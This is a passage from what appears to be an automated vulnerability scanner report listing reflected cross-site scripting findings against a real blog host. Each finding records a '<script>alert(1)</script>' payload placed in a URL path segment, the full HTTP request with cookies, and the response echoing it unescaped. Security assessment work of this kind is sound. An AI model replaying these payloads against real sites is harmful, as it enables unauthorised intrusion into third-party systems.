Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora37767<script>alert(1)</script>96a3bdaf0ab/archives/2006/02/ was not found on this server.</p>
...[SNIP]...

3.46. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bb5d<script>alert(1)</script>6b31a0b7960 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives5bb5d<script>alert(1)</script>6b31a0b7960/2006/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5bb5d<script>alert(1)</script>6b31a0b7960/2006/02/ was not found on this server.</p>
...[SNIP]...

3.47. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 654b6<script>alert(1)</script>c48ada1686b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006654b6<script>alert(1)</script>c48ada1686b/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006654b6<script>alert(1)</script>c48ada1686b/02/ was not found on this server.</p>
...[SNIP]...

3.48. http://blog.pandora.com/pandora/archives/2006/02/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5aa91<script>alert(1)</script>9eb948f65af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/025aa91<script>alert(1)</script>9eb948f65af/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/025aa91<script>alert(1)</script>9eb948f65af/ was not found on this server.</p>
...[SNIP]...

3.49. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d88f4<script>alert(1)</script>a463141d672 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorad88f4<script>alert(1)</script>a463141d672/archives/2006/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad88f4<script>alert(1)</script>a463141d672/archives/2006/03/ was not found on this server.</p>
...[SNIP]...

3.50. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 970b7<script>alert(1)</script>535a013270b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives970b7<script>alert(1)</script>535a013270b/2006/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives970b7<script>alert(1)</script>535a013270b/2006/03/ was not found on this server.</p>
...[SNIP]...

3.51. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35243<script>alert(1)</script>cbe6a64b700 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200635243<script>alert(1)</script>cbe6a64b700/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200635243<script>alert(1)</script>cbe6a64b700/03/ was not found on this server.</p>
...[SNIP]...

3.52. http://blog.pandora.com/pandora/archives/2006/03/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e7ab<script>alert(1)</script>fa977886cf6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/035e7ab<script>alert(1)</script>fa977886cf6/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/035e7ab<script>alert(1)</script>fa977886cf6/ was not found on this server.</p>
...[SNIP]...

3.53. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d20c0<script>alert(1)</script>dd135c67fdd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorad20c0<script>alert(1)</script>dd135c67fdd/archives/2006/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad20c0<script>alert(1)</script>dd135c67fdd/archives/2006/04/ was not found on this server.</p>
...[SNIP]...

3.54. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/04/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae903<script>alert(1)</script>470ea815a03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesae903<script>alert(1)</script>470ea815a03/2006/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesae903<script>alert(1)</script>470ea815a03/2006/04/ was not found on this server.</p>
...[SNIP]...

3.55. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/04/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7efd0<script>alert(1)</script>a5036d92cf6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20067efd0<script>alert(1)</script>a5036d92cf6/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20067efd0<script>alert(1)</script>a5036d92cf6/04/ was not found on this server.</p>
...[SNIP]...

3.56. http://blog.pandora.com/pandora/archives/2006/04/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/04/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8bc6a<script>alert(1)</script>12e73a2793e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/048bc6a<script>alert(1)</script>12e73a2793e/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/048bc6a<script>alert(1)</script>12e73a2793e/ was not found on this server.</p>
...[SNIP]...

3.57. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/05/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cd43a<script>alert(1)</script>e86a08eb842 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoracd43a<script>alert(1)</script>e86a08eb842/archives/2006/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoracd43a<script>alert(1)</script>e86a08eb842/archives/2006/05/ was not found on this server.</p>
...[SNIP]...

3.58. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/05/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 47765<script>alert(1)</script>7bc942491d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives47765<script>alert(1)</script>7bc942491d7/2006/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives47765<script>alert(1)</script>7bc942491d7/2006/05/ was not found on this server.</p>
...[SNIP]...

3.59. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/05/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8006b<script>alert(1)</script>683adabb342 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20068006b<script>alert(1)</script>683adabb342/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20068006b<script>alert(1)</script>683adabb342/05/ was not found on this server.</p>
...[SNIP]...

3.60. http://blog.pandora.com/pandora/archives/2006/05/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/05/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aa7d3<script>alert(1)</script>e86910f5065 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2006/05aa7d3<script>alert(1)</script>e86910f5065/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/05aa7d3<script>alert(1)</script>e86910f5065/ was not found on this server.</p>
...[SNIP]...

3.61. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/06/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33c8f<script>alert(1)</script>e3aabb416ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora33c8f<script>alert(1)</script>e3aabb416ad/archives/2006/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora33c8f<script>alert(1)</script>e3aabb416ad/archives/2006/06/ was not found on this server.</p>
...[SNIP]...

3.62. http://blog.pandora.com/pandora/archives/2006/06/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2006/06/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f087<script>alert(1)</script>fe8192ca492 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4f087<script>alert(1)</script>fe8192ca492/2006/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
